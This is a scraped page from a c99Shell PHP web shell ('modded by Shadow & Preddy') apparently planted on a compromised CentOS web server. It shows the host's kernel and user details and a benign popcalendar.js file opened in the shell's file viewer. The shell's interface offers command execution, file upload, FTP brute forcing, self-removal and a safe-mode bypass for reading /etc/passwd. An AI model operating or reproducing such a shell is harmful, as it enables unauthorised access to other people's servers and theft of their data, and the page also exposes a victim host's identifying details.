110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage_22222/calendar/ drwxr-xr-x Free 52.4 GB of 127.8 GB (41%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/calendar/ drwxr-xr-x
Free 52.4 GB of 127.8 GB (41%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

" } document.getElementById("selectMonth").innerHTML = "

Viewing file: popcalendar.js (20.81 KB) -rw-r--r--
Select action/file-type:
(+) | (+) |

(+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

// written by Tan Ling Wee on 2 Dec 2001 // last updated 23 June 2002 // email : fuushikaden@yahoo.com var fixedX = -1 // x position (-1 if to appear below control) var fixedY = -1 // y position (-1 if to appear below control) var startAt = 0 // 0 - sunday ; 1 - monday var showWeekNumber = 0 // 0 - don't show; 1 - show var showToday = 1 // 0 - don't show; 1 - show var imgDir = "images/" // directory for images ... e.g. var imgDir="/img/" var gotoString = "Go To Current Month" var todayString = "Today is" var weekString = "Wk" var scrollLeftMessage = "Click to scroll to previous month. Hold mouse button to scroll automatically." var scrollRightMessage = "Click to scroll to next month. Hold mouse button to scroll automatically." var selectMonthMessage = "Click to select a month." var selectYearMessage = "Click to select a year." var selectDateMessage = "Select [date] as date." // do not replace [date], it will be replaced by date. var crossobj, crossMonthObj, crossYearObj, monthSelected, yearSelected, dateSelected, omonthSelected, oyearSelected, odateSelected, monthConstructed, yearConstructed, intervalID1, intervalID2, timeoutID1, timeoutID2, ctlToPlaceValue, ctlNow, dateFormat, nStartingYear var bPageLoaded=false var ie=document.all var dom=document.getElementById var ns4=document.layers var today = new Date() var dateNow = today.getDate() var monthNow = today.getMonth() var yearNow = today.getYear() var imgsrc = new Array("drop1.gif","drop2.gif","left1.gif","left2.gif","right1.gif","right2.gif") var img = new Array() var bShow = false; /* hides and objects (for IE only) */ function showElement( elmID ) { if( ie ) { for( i = 0; i < document.all.tags( elmID ).length; i++ ) { obj = document.all.tags( elmID )[i]; if( !obj || !obj.offsetParent ) { continue; } obj.style.visibility = ""; } } } function HolidayRec (d, m, y, desc) { this.d = d this.m = m this.y = y this.desc = desc } var HolidaysCounter = 0 var Holidays = new Array() function addHoliday (d, m, y, desc) { Holidays[HolidaysCounter++] = new HolidayRec ( d, m, y, desc ) } if (dom) { for (i=0;i") if (showToday==1) { document.write ("") } document.write ("

"); } var monthName = new Array("January","February","March","April","May","June","July","August","September","October","November","December") if (startAt==0) { dayName = new Array ("Sun","Mon","Tue","Wed","Thu","Fri","Sat") } else { dayName = new Array ("Mon","Tue","Wed","Thu","Fri","Sat","Sun") } var styleAnchor="text-decoration:none;color:black;" var styleLightBorder="border-style:solid;border-width:1px;border-color:#a0a0a0;" function swapImage(srcImg, destImg){ if (ie) { document.getElementById(srcImg).setAttribute("src",imgDir + destImg) } } function init() { if (!ns4) { if (!ie) { yearNow += 1900 } crossobj=(dom)?document.getElementById("calendar").style : ie? document.all.calendar : document.calendar hideCalendar() crossMonthObj=(dom)?document.getElementById("selectMonth").style : ie? document.all.selectMonth : document.selectMonth crossYearObj=(dom)?document.getElementById("selectYear").style : ie? document.all.selectYear : document.selectYear monthConstructed=false; yearConstructed=false; if (showToday==1) { document.getElementById("lblToday").innerHTML = todayString + " "+dayName[(today.getDay()-startAt==-1)?6:(today.getDay()-startAt)]+", " + dateNow + " " + monthName[monthNow].substring(0,3) + " " + yearNow + "" } sHTML1="

" sHTML1+="

" sHTML1+=" " sHTML1+=" " document.getElementById("caption").innerHTML = sHTML1 bPageLoaded=true } } function hideCalendar() { crossobj.visibility="hidden" if (crossMonthObj != null){crossMonthObj.visibility="hidden"} if (crossYearObj != null){crossYearObj.visibility="hidden"} showElement( 'SELECT' ); showElement( 'APPLET' ); } function padZero(num) { return (num < 10)? '0' + num : num ; } function constructDate(d,m,y) { sTmp = dateFormat sTmp = sTmp.replace ("dd","") sTmp = sTmp.replace ("d","") sTmp = sTmp.replace ("",padZero(d)) sTmp = sTmp.replace ("",d) sTmp = sTmp.replace ("mmm","") sTmp = sTmp.replace ("mm","") sTmp = sTmp.replace ("m","") sTmp = sTmp.replace ("",m+1) sTmp = sTmp.replace ("",padZero(m+1)) sTmp = sTmp.replace ("",monthName[m]) return sTmp.replace ("yyyy",y) } function closeCalendar() { var sTmp hideCalendar(); ctlToPlaceValue.value = constructDate(dateSelected,monthSelected,yearSelected) } /*** Month Pulldown ***/ function StartDecMonth() { intervalID1=setInterval("decMonth()",80) } function StartIncMonth() { intervalID1=setInterval("incMonth()",80) } function incMonth () { monthSelected++ if (monthSelected>11) { monthSelected=0 yearSelected++ } constructCalendar() } function decMonth () { monthSelected-- if (monthSelected<0) { monthSelected=11 yearSelected-- } constructCalendar() } function constructMonth() { popDownYear() if (!monthConstructed) { sHTML = "" for (i=0; i<12; i++) { sName = monthName[i]; if (i==monthSelected){ sName = "" + sName + "" } sHTML += "

" + sName + "

" + sHTML + "

" monthConstructed=true } } function popUpMonth() { constructMonth() crossMonthObj.visibility = (dom||ie)? "visible" : "show" crossMonthObj.left = parseInt(crossobj.left) + 50 crossMonthObj.top = parseInt(crossobj.top) + 26 hideElement( 'SELECT', document.getElementById("selectMonth") ); hideElement( 'APPLET', document.getElementById("selectMonth") ); } function popDownMonth() { crossMonthObj.visibility= "hidden" } /*** Year Pulldown ***/ function incYear() { for (i=0; i<7; i++){ newYear = (i+nStartingYear)+1 if (newYear==yearSelected) { txtYear = " " + newYear + " " } else { txtYear = " " + newYear + " " } document.getElementById("y"+i).innerHTML = txtYear } nStartingYear ++; bShow=true } function decYear() { for (i=0; i<7; i++){ newYear = (i+nStartingYear)-1 if (newYear==yearSelected) { txtYear = " " + newYear + " " } else { txtYear = " " + newYear + " " } document.getElementById("y"+i).innerHTML = txtYear } nStartingYear --; bShow=true } function selectYear(nYear) { yearSelected=parseInt(nYear+nStartingYear); yearConstructed=false; constructCalendar(); popDownYear(); } function constructYear() { popDownMonth() sHTML = "" if (!yearConstructed) { sHTML = "-" j = 0 nStartingYear = yearSelected-3 for (i=(yearSelected-3); i<=(yearSelected+3); i++) { sName = i; if (i==yearSelected){ sName = "" + sName + "" } sHTML += " " + sName + " " j ++; } sHTML += "+" document.getElementById("selectYear").innerHTML = "" + sHTML + "

" yearConstructed = true } } function popDownYear() { clearInterval(intervalID1) clearTimeout(timeoutID1) clearInterval(intervalID2) clearTimeout(timeoutID2) crossYearObj.visibility= "hidden" } function popUpYear() { var leftOffset constructYear() crossYearObj.visibility = (dom||ie)? "visible" : "show" leftOffset = parseInt(crossobj.left) + document.getElementById("spanYear").offsetLeft if (ie) { leftOffset += 6 } crossYearObj.left = leftOffset crossYearObj.top = parseInt(crossobj.top) + 26 } /*** calendar ***/ function WeekNbr(n) { // Algorithm used: // From Klaus Tondering's Calendar document (The Authority/Guru) // hhtp://www.tondering.dk/claus/calendar.html // a = (14-month) / 12 // y = year + 4800 - a // m = month + 12a - 3 // J = day + (153m + 2) / 5 + 365y + y / 4 - y / 100 + y / 400 - 32045 // d4 = (J + 31741 - (J mod 7)) mod 146097 mod 36524 mod 1461 // L = d4 / 1460 // d1 = ((d4 - L) mod 365) + L // WeekNumber = d1 / 7 + 1 year = n.getFullYear(); month = n.getMonth() + 1; if (startAt == 0) { day = n.getDate() + 1; } else { day = n.getDate(); } a = Math.floor((14-month) / 12); y = year + 4800 - a; m = month + 12 * a - 3; b = Math.floor(y/4) - Math.floor(y/100) + Math.floor(y/400); J = day + Math.floor((153 * m + 2) / 5) + 365 * y + b - 32045; d4 = (((J + 31741 - (J % 7)) % 146097) % 36524) % 1461; L = Math.floor(d4 / 1460); d1 = ((d4 - L) % 365) + L; week = Math.floor(d1/7) + 1; return week; } function constructCalendar () { var aNumDays = Array (31,0,31,30,31,30,31,31,30,31,30,31) var dateMessage var startDate = new Date (yearSelected,monthSelected,1) var endDate if (monthSelected==1) { endDate = new Date (yearSelected,monthSelected+1,1); endDate = new Date (endDate - (24*60*60*1000)); numDaysInMonth = endDate.getDate() } else { numDaysInMonth = aNumDays[monthSelected]; } datePointer = 0 dayPointer = startDate.getDay() - startAt if (dayPointer<0) { dayPointer = 6 } sHTML = "" if (showWeekNumber==1) { sHTML += "" } for (i=0; i<7; i++) { sHTML += "" } sHTML +="" if (showWeekNumber==1) { sHTML += "" } for ( var i=1; i<=dayPointer;i++ ) { sHTML += "" } for ( datePointer=1; datePointer<=numDaysInMonth; datePointer++ ) { dayPointer++; sHTML += "" if ((showWeekNumber==1)&&(datePointer" } } } document.getElementById("content").innerHTML = sHTML document.getElementById("spanMonth").innerHTML = " " + monthName[monthSelected] + "

" document.getElementById("spanYear").innerHTML = " " + yearSelected + "

" } function popUpCalendar(ctl, ctl2, format) { var leftpos=0 var toppos=0 if (bPageLoaded) { if ( crossobj.visibility == "hidden" ) { ctlToPlaceValue = ctl2 dateFormat=format; formatChar = " " aFormat = dateFormat.split(formatChar) if (aFormat.length<3) { formatChar = "/" aFormat = dateFormat.split(formatChar) if (aFormat.length<3) { formatChar = "." aFormat = dateFormat.split(formatChar) if (aFormat.length<3) { formatChar = "-" aFormat = dateFormat.split(formatChar) if (aFormat.length<3) { // invalid date format formatChar="" } } } } tokensChanged = 0 if ( formatChar != "" ) { // use user's date aData = ctl2.value.split(formatChar) for (i=0;i<3;i++) { if ((aFormat[i]=="d") || (aFormat[i]=="dd")) { dateSelected = parseInt(aData[i], 10) tokensChanged ++ } else if ((aFormat[i]=="m") || (aFormat[i]=="mm")) { monthSelected = parseInt(aData[i], 10) - 1 tokensChanged ++ } else if (aFormat[i]=="yyyy") { yearSelected = parseInt(aData[i], 10) tokensChanged ++ } else if (aFormat[i]=="mmm") { for (j=0; j<12; j++) { if (aData[i]==monthName[j]) { monthSelected=j tokensChanged ++ } } } } } if ((tokensChanged!=3)||isNaN(dateSelected)||isNaN(monthSelected)||isNaN(yearSelected)) { dateSelected = dateNow monthSelected = monthNow yearSelected = yearNow } odateSelected=dateSelected omonthSelected=monthSelected oyearSelected=yearSelected aTag = ctl do { aTag = aTag.offsetParent; leftpos += aTag.offsetLeft; toppos += aTag.offsetTop; } while(aTag.tagName!="BODY"); crossobj.left = fixedX==-1 ? ctl.offsetLeft + leftpos : fixedX crossobj.top = fixedY==-1 ? ctl.offsetTop + toppos + ctl.offsetHeight + 2 : fixedY constructCalendar (1, monthSelected, yearSelected); crossobj.visibility=(dom||ie)? "visible" : "show" hideElement( 'SELECT', document.getElementById("calendar") ); hideElement( 'APPLET', document.getElementById("calendar") ); bShow = true; } else { hideCalendar() if (ctlNow!=ctl) {popUpCalendar(ctl, ctl2, format)} } ctlNow = ctl } } document.onkeypress = function hidecal1 () { if (event.keyCode==27) { hideCalendar() } } document.onclick = function hidecal2 () { if (!bShow) { hideCalendar() } bShow = false } init()

" + weekString + "	"+ dayName[i]+"
" + WeekNbr(startDate) + "		" sStyle=styleAnchor if ((datePointer==odateSelected) && (monthSelected==omonthSelected) && (yearSelected==oyearSelected)) { sStyle+=styleLightBorder } sHint = "" for (k=0;k " + datePointer + " "} else if (dayPointer % 7 == (startAt * -1)+1) { sHTML += " " + datePointer + " " } else { sHTML += " " + datePointer + " " } sHTML += "" if ((dayPointer+startAt) % 7 == startAt) { sHTML += "

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]--